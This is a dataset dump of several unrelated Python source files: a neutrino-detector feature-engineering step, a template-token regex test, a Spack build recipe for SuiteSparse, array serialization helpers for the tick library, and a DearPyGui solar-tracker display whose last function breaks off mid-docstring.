        pmt_dir = torch.stack((data['pmt_dir_x'], data['pmt_dir_y'], data['pmt_dir_z']), dim=1)
        charge = data['charge'].unsqueeze(dim=1)
        # Charge-weighted center of gravity, broadcast back to every pulse.
        center_of_gravity = sum_pool_and_distribute(xyz * charge, data.batch) / sum_pool_and_distribute(charge, data.batch)
        vector_to_center_of_gravity = center_of_gravity - xyz
        distance_to_center_of_gravity = torch.norm(vector_to_center_of_gravity, p=2, dim=1)
        # Small epsilon avoids division by zero for pulses sitting at the COG.
        unit_vector_to_center_of_gravity = vector_to_center_of_gravity / (distance_to_center_of_gravity.unsqueeze(dim=1) + 1e-3)
        cos_angle_wrt_center_of_gravity = (pmt_dir * unit_vector_to_center_of_gravity).sum(dim=1)
        photoelectrons_on_pmt = sum_pool_and_distribute(data['charge'], data.pmt_index, data.batch).floor().clip(1, None)

        # Add new features
        data.x = torch.cat((
            data.x,
            photoelectrons_on_pmt.unsqueeze(dim=1),
            distance_to_center_of_gravity.unsqueeze(dim=1),
            cos_angle_wrt_center_of_gravity.unsqueeze(dim=1),
        ), dim=1)

        # Preprocessing (same normalization as IceCubeUpgrade)
        data.x[:,0] /= 500.  # dom_x
        data.x[:,1] /= 500.  # dom_y
        data.x[:,2] /= 500.  # dom_z
        data.x[:,3] /= 2e+04  # dom_time
        data.x[:,3] -= 1.
        data.x[:,4] = torch.log10(data.x[:,4]) / 2.  # charge
        #data.x[:,5] /= 1.  # rde
        data.x[:,6] /= 0.05  # pmt_area
        data.x[:,7] -= 50.  # string
        data.x[:,7] /= 50.
        data.x[:,8] /= 20.  # pmt_number
        data.x[:,9] -= 60.  # dom_number
        data.x[:,9] /= 60.
        #data.x[:,10] /= 1.  # pmt_dir_x
        #data.x[:,11] /= 1.  # pmt_dir_y
        #data.x[:,12] /= 1.  # pmt_dir_z
        data.x[:,13] /= 130.  # dom_type

        # -- Engineered features (the cosine column is already in [-1, 1])
        data.x[:,14] = torch.log10(data.x[:,14]) / 2.  # photoelectrons_on_pmt
        data.x[:,15] = torch.log10(1e-03 + data.x[:,15]) / 2.  # distance_to_center_of_gravity

        return data
tests/routes_parsing/test1.py | hellojoechip/bambleweeny | 22 | 16968 | <filename>tests/routes_parsing/test1.py
import re

# Matches embedded template tokens such as !@[value1] or !@[system:uptime].
# Raw strings avoid the invalid "\[" escape warnings of the original; the
# pattern is compiled once instead of on every call.
TOKEN_PATTERN = re.compile(r'!@\[[_a-zA-Z0-9:]*\]')

# Marker inserted around each token so the text can be split into segments;
# chosen to be unlikely to occur naturally in the input.
MARKER = '_B9yPrsE_'


def contains_token(text):
    """Return True if *text* contains at least one !@[...] token."""
    return TOKEN_PATTERN.search(text) is not None


def split_on_tokens(text):
    """Split *text* into a list of plain segments and !@[...] tokens."""
    marked = TOKEN_PATTERN.sub(MARKER + r'\g<0>' + MARKER, text)
    return marked.split(MARKER)


def token_name(token):
    """Strip the !@[ ] wrapper, keeping only word characters and colons."""
    return re.sub(r'[^\w:]', '', token)


def main():
    """Demonstrate token detection and parsing on a sample string."""
    t1 = 'Data !@[value1] and also !@[system:uptime] testing.'
    print("Content: " + t1)

    print("YES" if contains_token(t1) else "NO")

    for segment in split_on_tokens(t1):
        if segment.startswith("!@["):
            print("Parse: " + str(segment) + " " + str(token_name(segment)))
        else:
            print("Plain: '" + str(segment) + "'")


if __name__ == "__main__":
    main()
| 2.90625 | 3 |
internal/notes/builtin-SAVE/packages/suite-sparse/package.py | HPCToolkit/hpctest | 1 | 16969 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by <NAME>, <EMAIL>, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class SuiteSparse(Package):
    """
    SuiteSparse is a suite of sparse matrix algorithms
    """
    homepage = 'http://faculty.cse.tamu.edu/davis/suitesparse.html'
    url = 'http://faculty.cse.tamu.edu/davis/SuiteSparse/SuiteSparse-4.5.1.tar.gz'

    version('4.5.5', '0a5b38af0016f009409a9606d2f1b555')
    version('4.5.4', 'f6ab689442e64a1624a47aa220072d1b')
    version('4.5.3', '8ec57324585df3c6483ad7f556afccbd')
    version('4.5.1', 'f0ea9aad8d2d1ffec66a5b6bfeff5319')

    variant('tbb', default=False, description='Build with Intel TBB')
    variant('pic', default=True, description='Build position independent code (required to link with shared libraries)')
    variant('cuda', default=False, description='Build with CUDA')
    variant('openmp', default=False, description='Build with OpenMP')

    depends_on('blas')
    depends_on('lapack')

    depends_on('metis@5.1.0', when='@4.5.1:')
    # in @4.5.1. TBB support in SPQR seems to be broken as TBB-related linking
    # flags do not seem to be used, which leads to linking errors on Linux.
    depends_on('tbb', when='@4.5.3:+tbb')

    depends_on('cuda', when='+cuda')

    patch('tbb_453.patch', when='@4.5.3:+tbb')

    # This patch removes unsupported flags for the pgi compiler
    patch('pgi.patch', when='%pgi')

    def install(self, spec, prefix):
        """Build SuiteSparse with plain `make` and install it under *prefix*.

        All customization is passed as VAR=value make arguments, overriding
        the defaults from SuiteSparse_config/SuiteSparse_config.mk.
        """
        # The build system of SuiteSparse is quite old-fashioned.
        # It's basically a plain Makefile which includes a header
        # (SuiteSparse_config/SuiteSparse_config.mk) with a lot of convoluted
        # logic in it. Any kind of customization will need to go through
        # filtering of that file

        pic_flag = self.compiler.pic_flag if '+pic' in spec else ''

        make_args = [
            'INSTALL=%s' % prefix,
            # By default, the Makefile uses the Intel compilers if
            # they are found. The AUTOCC flag disables this behavior,
            # forcing it to use Spack's compiler wrappers.
            'AUTOCC=no',
            # CUDA=no does NOT disable cuda, it only disables internal search
            # for CUDA_PATH. If in addition the latter is empty, then CUDA is
            # completely disabled. See
            # [SuiteSparse/SuiteSparse_config/SuiteSparse_config.mk] for more.
            'CUDA=no',
            'CUDA_PATH=%s' % (spec['cuda'].prefix if '+cuda' in spec else ''),
            'CFOPENMP=%s' % (self.compiler.openmp_flag
                             if '+openmp' in spec else ''),
            'CFLAGS=-O3 %s' % pic_flag,
            # Both FFLAGS and F77FLAGS are used in SuiteSparse makefiles;
            # FFLAGS is used in CHOLMOD, F77FLAGS is used in AMD and UMFPACK.
            'FFLAGS=%s' % pic_flag,
            'F77FLAGS=%s' % pic_flag,
            # use Spack's metis in CHOLMOD/Partition module,
            # otherwise internal Metis will be compiled
            'MY_METIS_LIB=%s' % spec['metis'].libs.ld_flags,
            'MY_METIS_INC=%s' % spec['metis'].prefix.include,
            # Make sure Spack's Blas/Lapack is used. Otherwise System's
            # Blas/Lapack might be picked up. Need to add -lstdc++, following
            # with the TCOV path of SparseSuite 4.5.1's Suitesparse_config.mk,
            # even though this fix is ugly
            'BLAS=%s' % (spec['blas'].libs.ld_flags + (
                '-lstdc++' if '@4.5.1' in spec else '')),
            'LAPACK=%s' % spec['lapack'].libs.ld_flags,
        ]

        # SuiteSparse defaults to using '-fno-common -fexceptions' in
        # CFLAGS, but not all compilers use the same flags for these
        # optimizations
        if any([x in spec
                for x in ('%clang', '%gcc', '%intel')]):
            make_args += ['CFLAGS+=-fno-common -fexceptions']
        elif '%pgi' in spec:
            make_args += ['CFLAGS+=--exceptions']

        if '%xl' in spec or '%xl_r' in spec:
            make_args += ['CFLAGS+=-DBLAS_NO_UNDERSCORE']

        # Intel TBB in SuiteSparseQR
        if 'tbb' in spec:
            make_args += [
                'SPQR_CONFIG=-DHAVE_TBB',
                'TBB=-L%s -ltbb' % spec['tbb'].prefix.lib,
            ]

        make('install', *make_args)
| 1.640625 | 2 |
tick/array/serialize.py | andro2157/tick | 0 | 16970 | <reponame>andro2157/tick<filename>tick/array/serialize.py
# License: BSD 3 clause
import os
import numpy as np
import scipy
from tick.array.build.array import (
tick_float_array_to_file,
tick_float_array2d_to_file,
tick_float_sparse2d_to_file,
tick_double_array_to_file,
tick_double_array2d_to_file,
tick_double_sparse2d_to_file,
tick_float_array_from_file,
tick_float_array2d_from_file,
tick_float_sparse2d_from_file,
tick_double_array_from_file,
tick_double_array2d_from_file,
tick_double_sparse2d_from_file,
)
def serialize_array(array, filepath):
    """Save an array on disk in a format that tick C++ modules can read.

    This method is intended to be used by developers only, mostly for
    benchmarking in C++ on real datasets imported from Python.

    Parameters
    ----------
    array : `np.ndarray` or `scipy.sparse.csr_matrix`
        1d or 2d array

    filepath : `str`
        Path where the array will be stored

    Returns
    -------
    path : `str`
        Global path of the serialized array

    Raises
    ------
    ValueError
        If the dtype is not float32/float64 or the dimensionality is not
        supported for the given array class.
    """
    if array.dtype not in [np.float32, np.float64]:
        raise ValueError('Only float32/64 arrays can be serialized')

    # Select the C++ writer matching (dtype, dense/sparse, dimensionality).
    if array.dtype == "float32":
        if isinstance(array, np.ndarray):
            if len(array.shape) == 1:
                serializer = tick_float_array_to_file
            elif len(array.shape) == 2:
                serializer = tick_float_array2d_to_file
            else:
                raise ValueError('Only 1d and 2d arrays can be serialized')
        else:
            # Sparse matrices always expose a 2d shape.
            if len(array.shape) == 2:
                serializer = tick_float_sparse2d_to_file
            else:
                raise ValueError('Only 2d sparse arrays can be serialized')
    elif array.dtype == "float64" or array.dtype == "double":
        if isinstance(array, np.ndarray):
            if len(array.shape) == 1:
                serializer = tick_double_array_to_file
            elif len(array.shape) == 2:
                serializer = tick_double_array2d_to_file
            else:
                raise ValueError('Only 1d and 2d arrays can be serialized')
        else:
            if len(array.shape) == 2:
                serializer = tick_double_sparse2d_to_file
            else:
                raise ValueError('Only 2d sparse arrays can be serialized')
    else:
        # Unreachable given the dtype check above; kept as a safety net.
        raise ValueError('Unhandled serialization type')

    serializer(filepath, array)
    return os.path.abspath(filepath)
def load_array(filepath, array_type='dense', array_dim=1, dtype="float64"):
    """Load an array from disk from a format that tick C++ modules can read.

    This method is intended to be used by developers only, mostly for
    benchmarking in C++ on real datasets imported from Python.

    Parameters
    ----------
    filepath : `str`
        Path where the array was stored

    array_type : {'dense', 'sparse'}, default='dense'
        Expected type of the array

    array_dim : `int`
        Expected dimension of the array

    dtype : {'float32', 'float64', 'double'}, default='float64'
        Expected scalar type of the stored array

    Returns
    -------
    array : `np.ndarray` or `scipy.sparse.csr_matrix`
        1d or 2d array

    Raises
    ------
    FileNotFoundError
        If *filepath* does not exist.
    ValueError
        If the (dtype, array_type, array_dim) combination is unsupported.
    """
    abspath = os.path.abspath(filepath)
    if not os.path.exists(filepath):
        raise FileNotFoundError('File {} does not exist'.format(abspath))

    # Select the C++ reader matching (dtype, dense/sparse, dimensionality).
    if dtype == "float32":
        if array_type == 'dense':
            if array_dim == 1:
                reader = tick_float_array_from_file
            elif array_dim == 2:
                reader = tick_float_array2d_from_file
            else:
                raise ValueError('Only 1d and 2d arrays can be loaded')
        elif array_type == 'sparse':
            if array_dim == 2:
                reader = tick_float_sparse2d_from_file
            else:
                raise ValueError('Only 2d sparse arrays can be loaded')
        else:
            raise ValueError('Cannot load this class of array')
    elif dtype == "float64" or dtype == "double":
        if array_type == 'dense':
            if array_dim == 1:
                reader = tick_double_array_from_file
            elif array_dim == 2:
                reader = tick_double_array2d_from_file
            else:
                raise ValueError('Only 1d and 2d arrays can be loaded')
        elif array_type == 'sparse':
            if array_dim == 2:
                reader = tick_double_sparse2d_from_file
            else:
                raise ValueError('Only 2d sparse arrays can be loaded')
        else:
            raise ValueError('Cannot load this class of array')
    else:
        raise ValueError('Unhandled serialization type')

    return reader(filepath)
| 2.734375 | 3 |
__init__.py | bbockelm/glideinWMS | 0 | 16971 | __all__=["factory","frontend","lib","tools","creation","install","unittests"]
| 1.023438 | 1 |
views/menuVisualizacaoGeral.py | iOsnaaente/Tracker-solar-Supervisorio | 2 | 16972 | import dearpygui.dearpygui as dpg
import datetime as dt
import math
from registry import *
SUN_DATA.update_date()
# FUNCTIONS
def get_semi_circle_points( center, radius, angle_i, angle_f, segments = 360, closed = False ):
    """Return points sampling the arc from angle_i to angle_f around *center*.

    Angles are in radians. Screen coordinates are used, so the y component is
    ``center[1] - radius*sin(angle)`` (y grows downwards). ``angle_f`` itself
    is excluded: ``segments`` evenly spaced samples start at ``angle_i``.

    Args:
        center: [x, y] center of the arc.
        radius: Arc radius in pixels.
        angle_i: Start angle (radians).
        angle_f: End angle (radians, exclusive).
        segments: Number of sample points along the arc.
        closed: If True, prepend the fixed top/center/right closing points
            used to fill the shape.

    Returns:
        List of [x, y] points.
    """
    # BUGFIX: the start angle is now added to every sample; previously the
    # arc always started at angle 0 and angle_i only affected the arc length.
    step = (angle_f - angle_i) / segments
    angles = [ angle_i + step * n for n in range(segments) ]
    points = [ [ center[0] + radius * math.cos(ang), center[1] - radius * math.sin(ang) ] for ang in angles ]
    if closed:
        points_close = [ [ center[0], center[1] - radius ], center, [ center[0] + radius, center[1] ] ]
        points_close.extend( points )
        return points_close
    return points
def draw_sun_trajetory( draw_id, parent_id, all_day = False, extremes = False ):
    """Create (once) all drawing items of the sun-trajectory dial on *draw_id*.

    Items are tagged id_link+1 .. id_link+11 plus one circle per trajectory
    sample (id_link+12+n), where id_link = draw_id*100. update_sun_trajetory()
    later reconfigures these same tags, so the tag scheme must stay in sync.

    Args:
        draw_id: dpg drawlist receiving the drawing items.
        parent_id: enclosing window id (not used in this function).
        all_day: if True, sample the trajectory over the whole day.
        extremes: unused — kept for interface compatibility. TODO confirm intent.
    """
    # Center point, canvas dimensions and dial radius
    width, height = dpg.get_item_width( draw_id ), dpg.get_item_height( draw_id )
    center = [ width//2, height//2 ]
    r = width//2 - 20 if width+20 <= height else height//2 - 20
    id_link = draw_id*100
    # Sunrise and sunset azimuths; NOTE(review): both take index [1] of the
    # returned pair, so the name `alt` actually holds the SUNSET azimuth.
    azi = SUN_DATA.get_pos_from_date( SUN_DATA.rising )[1]
    alt = SUN_DATA.get_pos_from_date( SUN_DATA.sunset )[1] # [ alt , azi ]
    # Sample the sun trajectory angles
    dots = SUN_DATA.trajetory(100, all_day )
    # Project (azimuth, altitude) onto the dial; azimuth is rotated by -pi/2
    # so that north points up on screen.
    dots = [ [ x - math.pi/2 , y ] for x, y, _ in dots ]
    dots = [ [ center[0] + math.cos(x)*r, center[1] + math.sin(x)*math.cos(y)*r ] for x, y in dots ]
    # Current sun position, projected the same way
    sun = [ SUN_DATA.azi - math.pi/2, SUN_DATA.alt ]
    sun = [ center[0] + math.cos(sun[0])*r, center[1] + math.sin(sun[0])*math.cos(sun[1])*r ]
    # Static dial: horizon line, sunrise/sunset rays, outer circle, center dot,
    # W/E/N labels, the trajectory polyline and its per-sample markers.
    dpg.draw_line( parent = draw_id, tag = id_link+1 , p1 = [center[0] - r, center[1]] , p2 = [center[0] + r, center[1]] , color = COLOR['gray'](155) , thickness = 1 )
    dpg.draw_line( parent = draw_id, tag = id_link+2 , p1 = center , p2 = [center[0] + r*math.cos(azi-math.pi/2), center[1] + r*math.sin(azi-math.pi/2)], color = COLOR['orange'](155), thickness = 2 )
    dpg.draw_line( parent = draw_id, tag = id_link+3 , p1 = center , p2 = [center[0] + r*math.cos(alt-math.pi/2), center[1] + r*math.sin(alt-math.pi/2)], color = COLOR['gray'](200) , thickness = 2 )
    dpg.draw_circle( parent = draw_id, tag = id_link+4 , center = center , radius = r , color = COLOR['white'](200) , fill = COLOR['white'](10 ), thickness = 3 )
    dpg.draw_circle( parent = draw_id, tag = id_link+5 , center = center , radius = 3 , color = COLOR['white'](200) , fill = COLOR['white'](255), thickness = 2 )
    dpg.draw_text( parent = draw_id, tag = id_link+6 , pos = [center[0] -(r +20), center[1] -10 ] , text = 'W' , color = COLOR['white'](200) , size = 20 )
    dpg.draw_text( parent = draw_id, tag = id_link+7 , pos = [center[0] +(r +5) , center[1] -10 ] , text = 'E' , color = COLOR['white'](200) , size = 20 )
    dpg.draw_text( parent = draw_id, tag = id_link+8 , pos = [center[0] -10 , center[1] -(r +25)], text = 'N' , color = COLOR['white'](255) , size = 20 )
    dpg.draw_polyline( parent = draw_id, tag = id_link+9 , points = dots , color = COLOR['red'](155) , thickness = 2 , closed = False )
    # One small marker per sample, colored along a gradient to show direction.
    for n, p in enumerate(dots):
        dpg.draw_circle( parent = draw_id, tag = id_link+(12+n) , center = p , radius = 2 , color = [n*4, 255-n*2, n*2, 255] )
    # Sun ray and sun disc at the current position
    dpg.draw_line( parent = draw_id, tag = id_link+10 , p1 = center, p2 = sun, color = COLOR['yellow'](200) , thickness = 2 )
    dpg.draw_circle( parent = draw_id, tag = id_link+11 , center = sun , radius = 10 , color = COLOR['yellow'](155) , fill = COLOR['yellow'](255) )
def update_sun_trajetory( draw_id, parent_id, all_day = False ):
    """Reposition the drawing items created by draw_sun_trajetory().

    Recomputes the dial geometry from the current drawlist size and the
    current SUN_DATA state, then reconfigures the items tagged
    id_link+1 .. id_link+11 and the per-sample markers (id_link+12+n).

    Args:
        draw_id: dpg drawlist whose items are updated.
        parent_id: enclosing window id (kept for interface compatibility).
        all_day: if True, sample the trajectory over the whole day.
    """
    # Center point, canvas dimensions and dial radius.
    # (The unused query of 'mainWindow' dimensions was removed.)
    width, height = dpg.get_item_width( draw_id ), dpg.get_item_height( draw_id )
    center = [ width//2, height//2 ]
    r = width//2 - 20 if width+20 <= height else height//2 - 20
    id_link = draw_id*100
    # Sunrise and sunset azimuths (same convention as draw_sun_trajetory)
    azi = SUN_DATA.get_pos_from_date( SUN_DATA.rising )[1]
    alt = SUN_DATA.get_pos_from_date( SUN_DATA.sunset )[1] # [ alt , azi ]
    # Sample the sun trajectory and project (azimuth, altitude) onto the dial
    dots = SUN_DATA.trajetory(100, all_day )
    dots = [ [ x - math.pi/2 , y ] for x, y, _ in dots ]
    dots = [ [ center[0] + math.cos(x)*r, center[1] + math.sin(x)*math.cos(y)*r ] for x, y in dots ]
    # Current sun position, projected the same way
    sun = [ SUN_DATA.azi - math.pi/2, SUN_DATA.alt ]
    sun = [ center[0] + math.cos(sun[0])*r, center[1] + math.sin(sun[0])*math.cos(sun[1])*r ]
    # Reconfigure the static dial items
    dpg.configure_item( id_link+1 , p1 = [center[0] - r, center[1]], p2 = [center[0] + r, center[1]] )
    dpg.configure_item( id_link+2 , p1 = center , p2 = [center[0] + r*math.cos(azi-math.pi/2), center[1] + r*math.sin(azi-math.pi/2)] )
    dpg.configure_item( id_link+3 , p1 = center , p2 = [center[0] + r*math.cos(alt-math.pi/2), center[1] + r*math.sin(alt-math.pi/2)] )
    dpg.configure_item( id_link+4 , center = center , radius = r )
    dpg.configure_item( id_link+5 , center = center , radius = 3 )
    dpg.configure_item( id_link+6 , pos = [center[0] - (r + 20), center[1] -10 ] )
    dpg.configure_item( id_link+7 , pos = [center[0] + (r + 5), center[1] -10 ] )
    dpg.configure_item( id_link+8 , pos = [center[0] - 10 , center[1] - (r + 25) ] )
    dpg.configure_item( id_link+9 , points = dots )
    dpg.configure_item( id_link+10, p1 = center , p2 = sun )
    dpg.configure_item( id_link+11, center = sun )
    # Move every per-sample marker of the trajectory
    for n, p in enumerate(dots):
        dpg.configure_item( id_link+(12+n) , center = p )
def att_sunpos_graphs( ):
    """Refresh the azimuth/altitude day plots and the current-position markers.

    Temporarily switches SUN_DATA to the display date (now, or the operator
    date in manual mode), samples the day trajectory, restores the previous
    date, and pushes the series into the dpg plot items (tags 2213/2214 and
    2223/2224, axes 2211/2221).
    """
    last_date = SUN_DATA.date
    # Evaluate the trajectory either for "now" or for the user-provided date.
    if not dpg.get_value( HORA_MANUAL ): SUN_DATA.set_date( dt.datetime.utcnow() )
    else: SUN_DATA.set_date( dt.datetime( dpg.get_value(YEAR), dpg.get_value(MONTH), dpg.get_value(DAY), dpg.get_value(HOUR), dpg.get_value(MINUTE), dpg.get_value(SECOND) ) )
    azi_alt = SUN_DATA.trajetory( 50, all_day = False )
    # Restore the previous date right away (a second redundant restore was removed).
    SUN_DATA.set_date( last_date )
    AZI = []
    ALT = []
    PTI = []
    for azi, alt, tim in azi_alt:
        # Re-center azimuth around the plotting convention and clamp altitude;
        # x values are POSIX timestamps (the axes use time=True).
        AZI.append( math.degrees(azi - math.pi) if azi > math.pi else math.degrees(azi + math.pi) )
        ALT.append( math.degrees(alt) if alt < math.pi else 0 )
        PTI.append( int( dt.datetime.timestamp( tim )) )
    azi, alt = [math.degrees(SUN_DATA.azi)], [math.degrees(SUN_DATA.alt)]
    # BUGFIX: the scatter x-coordinate is a POSIX timestamp and must NOT be
    # passed through math.degrees(); the original multiplied it by 180/pi,
    # pushing the "current point" far outside the plotted axis range.
    time_scrt = [dt.datetime.timestamp( last_date )]
    dpg.configure_item (22_13, x = PTI , y = AZI )
    dpg.configure_item (22_14, x = time_scrt, y = azi )
    dpg.set_axis_limits(22_11, ymin = PTI[0] , ymax = PTI[-1] )
    dpg.configure_item (22_23, x = PTI , y = ALT )
    dpg.configure_item (22_24, x = time_scrt, y = alt )
    dpg.set_axis_limits(22_21, ymin = PTI[0] , ymax = PTI[-1] )
# MAIN FUNCTIONS
def init_visualizacaoGeral( windows : dict ):
    """Build all windows/widgets of the "Visualizacao geral" view.

    Widget tags are numeric literals written with visual underscores
    (e.g. 21_0 == 210, 2_1_0 == 210) — the grouping is purely cosmetic.
    All created windows are hidden at the end; the view switcher shows them.

    Args:
        windows: registry mapping view names to dpg window ids; this function
            appends its three windows to windows["Visualizacao geral"].
    """
    # SUN POSITION window (the dial drawing)
    with dpg.window( label = 'Posição solar' , tag = 21_0, pos = [50,50], width = 500 , height = 500 , no_move = True, no_resize = True, no_collapse = True, no_close = True, no_title_bar= True ) as Posicao_sol_VG:
        windows["Visualizacao geral"].append( Posicao_sol_VG )
        w, h = dpg.get_item_width(2_1_0), dpg.get_item_height(2_1_0)
        dpg.add_drawlist ( tag = 21_1_0, width = w-20 , height = h-50, label = 'Solar')
        draw_sun_trajetory ( draw_id = 2_1_1_0, parent_id = 2_1_0 )
    # Sun position display — uses plots (same as the tooltip)
    with dpg.window( label = 'Atuação' , tag = 22_0, no_move = True , no_resize = True, no_collapse = True, no_close = True ) as Atuacao_VG:
        windows["Visualizacao geral"].append( Atuacao_VG )
        dpg.add_text('Área para a atução da posição dos paineis solares')
        with dpg.group( horizontal = True ):
            # Daily azimuth plot: time on X (hidden tick labels), degrees on Y
            with dpg.plot( tag = 2_2_1_0, label = 'Azimute do dia', height = 312, width = 478, anti_aliased = True ):
                dpg.add_plot_legend()
                dpg.add_plot_axis( dpg.mvXAxis, label = 'Hora [h]' , tag = 2_2_1_1, parent = 2_2_1_0, time = True, no_tick_labels = True ) # X
                dpg.add_plot_axis( dpg.mvYAxis, label = 'Angulo [º]', tag = 2_2_1_2, parent = 2_2_1_0 ) # Y
                dpg.set_axis_limits_auto( 2_2_1_1 )
                dpg.set_axis_limits ( 2_2_1_2, -5, 370 )
                dpg.add_line_series ( [], [], tag = 2_2_1_3, label = 'Rota diária', parent = 2_2_1_2 )
                dpg.add_scatter_series ( [], [], tag = 2_2_1_4, label = 'Ponto atual', parent = 2_2_1_2 )
            # Daily altitude plot, same layout
            with dpg.plot( tag = 2_2_2_0, label = 'Altitude do dia', height = 312, width = 478, anti_aliased = True ):
                dpg.add_plot_axis( dpg.mvXAxis, label = 'Hora [h]' , tag = 2_2_2_1, parent = 2_2_2_0, time = True, no_tick_labels = True ) # X
                dpg.add_plot_axis( dpg.mvYAxis, label = 'Angulo [º]', tag = 2_2_2_2, parent = 2_2_2_0 ) # Y
                dpg.set_axis_limits_auto( 2_2_2_1 )
                dpg.set_axis_limits ( 2_2_2_2, -5, 100 )
                dpg.add_plot_legend()
                dpg.add_line_series ( [], [], tag = 2_2_2_3, label = 'Rota diária', parent = 2_2_2_2 )
                dpg.add_scatter_series ( [], [], tag = 2_2_2_4, label = 'Ponto atual', parent = 2_2_2_2 )
        att_sunpos_graphs( )
    # Time settings — a panel toggled between automatic and manual time
    with dpg.window( label = 'Painel de log' , tag = 23_0, no_move = True , no_resize = True, no_collapse = True, no_close = True, no_title_bar = True ) as Painel_log_VG:
        windows["Visualizacao geral"].append( Painel_log_VG )
        dpg.add_text( default_value = 'Informações gerais do sistema')
        with dpg.child_window( tag = 23_00, autosize_x = True, height = 170, menubar = True):
            with dpg.menu_bar( tag = 23_01, label = 'menubar para datetime',):
                # Menu items toggle the HORA_MANUAL flag read by render/att functions
                dpg.add_menu_item( tag = 23_02, label = 'Hora automática', callback = lambda s, d, u : dpg.set_value(HORA_MANUAL, False), shortcut = 'A data e hora de calculo é definida automaticamente de acordo com a hora do controlador local')
                dpg.add_menu_item( tag = 23_03, label = 'Hora manual' , callback = lambda s, d, u : dpg.set_value(HORA_MANUAL, True ), shortcut = 'A data e hora de calculo é definida pela entrada do operador no supervisório' )
            with dpg.child_window( tag = 23_10):
                # General system information - automatic time panel
                dpg.add_text( default_value = 'Hora automática')
                dpg.add_drag_floatx( tag = 23_1, label = 'Ano/Mes/Dia Auto' , size = 3, format = '%.0f', speed = 0.1 , min_value = 1 , max_value = 3000 , no_input = True )
                dpg.add_drag_floatx( tag = 23_2, label = 'Hora/Min/Sec Auto' , size = 3, format = '%.0f', speed = 0.1 , no_input = True )
                dpg.add_drag_int ( tag = 23_3, label = 'Valor no dia' , format = '%.0f' , speed = 0.1 , min_value = 0 , max_value = 26*3600, no_input = True, source = TOT_SECONDS, enabled = False)
                dpg.add_drag_int ( tag = 23_4, label = 'Dia Juliano' , format = '%.0f' , speed = 0.1 , min_value = 0 , max_value = 366 , no_input = True, source = JULIANSDAY , enabled = False)
            with dpg.child_window( tag = 23_20):
                # General system information - manual time panel
                dpg.add_text( default_value = 'Hora manual')
                dpg.add_input_floatx( tag = 23_6, label = 'Ano/Mes/Dia Manual' , size = 3, default_value = [2020, 12, 25], format='%.0f', min_value = 1, max_value = 3000 )
                dpg.add_input_floatx( tag = 23_7, label = 'Hora/Min/Sec Manual', size = 3, default_value = [20, 30, 10] , format='%.0f', min_value = 1, max_value = 60 )
                dpg.add_drag_int ( tag = 23_8, label = 'Valor no dia' , format = '%.0f', speed = 0.1 , min_value = 0, max_value = 24*3600, no_input = True, source = TOT_SECONDS, enabled = False )
                dpg.add_drag_int ( tag = 23_9, label = '<NAME>' , format = '%.0f', speed = 0.1 , min_value = 0, max_value = 366 , no_input = True, source = JULIANSDAY , enabled = False )
        # Conditional expression used for its side effect: hide whichever panel is inactive
        dpg.hide_item( 23_20 ) if dpg.get_value(HORA_MANUAL) == False else dpg.hide_item( 2_3_1_0 )
        dpg.add_spacer( height = 5 )
        with dpg.child_window( tag = 23_30, autosize_x = True, autosize_y = True ):
            # Local longitude and latitude settings
            with dpg.child_window ( height = 90 ):
                dpg.add_text ( default_value = 'Definições de longitude e latitude local')
                dpg.add_input_float( label = 'Latitude' , tag = 2_3_10, min_value = -90, max_value = 90, format = '%3.8f', indent=0.01, source = LATITUDE , callback = lambda sender, data, user : SUN_DATA.set_latitude( data ) )
                dpg.add_spacer ( )
                dpg.add_input_float( label = 'Longitude', tag = 2_3_11, min_value = -90, max_value = 90, format = '%3.8f', indent=0.01, source = LONGITUDE, callback = lambda sender, data, user : SUN_DATA.set_longitude( data ) )
            dpg.add_spacer( height = 5 )
            with dpg.child_window( height = 150 ):
                # Sun information read-outs (filled in by render_visualizacaoGeral)
                dpg.add_text ( default_value = 'Informacoes do sol')
                dpg.add_drag_float ( label = 'Azimute' , tag = 23_12, format = '%4.2f', speed = 1, no_input = True, source = AZIMUTE )
                dpg.add_spacer ( )
                dpg.add_drag_float ( label = 'Altitude' , tag = 23_13, format = '%4.2f', speed = 1, no_input = True, source = ZENITE )
                dpg.add_spacer ( )
                dpg.add_drag_float ( label = 'Elevação (m)' , tag = 23_14, format = '%4.0f', speed = 1, no_input = True, source = ALTITUDE )
                dpg.add_spacer ( )
                dpg.add_drag_floatx( label = 'Horas de sol' , tag = 23_15, size = 3, format = '%.0f', no_input = True )
            dpg.add_spacer( height = 5 )
            with dpg.child_window( height = 200 ):
                # Positions of interest (sunrise / culmination / sunset).
                # NOTE(review): the callbacks look swapped — 'Culminante' writes
                # H_SUNSET and 'Por do sol' writes H_CULMINANT; also
                # list.extend() returns None, so set_value receives None — confirm.
                dpg.add_text ( default_value = "Posicoes de interesse", )
                dpg.add_text ( default_value = 'Nascer do sol (hh/mm/ss)')
                dpg.add_drag_floatx( tag = 2_3_16, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_SUNRISE , data.extend([0])) )
                dpg.add_spacer ( )
                dpg.add_text ( default_value = 'Culminante (hh/mm/ss)' )
                dpg.add_drag_floatx( tag = 2_3_17, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_SUNSET , data.extend([0])) )
                dpg.add_spacer ( )
                dpg.add_text ( default_value = 'Por do sol (hh/mm/ss)' )
                dpg.add_drag_floatx( tag = 2_3_18, size = 3, format='%.0f', speed=1, no_input= True, callback = lambda sender, data, user : dpg.set_value( H_CULMINANT, data.extend([0])) )
    # All windows start hidden; the view switcher shows them on demand.
    dpg.hide_item( 21_0 )
    dpg.hide_item( 22_0 )
    dpg.hide_item( 23_0 )
def resize_visualizacaoGeral( ):
    """Re-layout the view after the main window is resized.

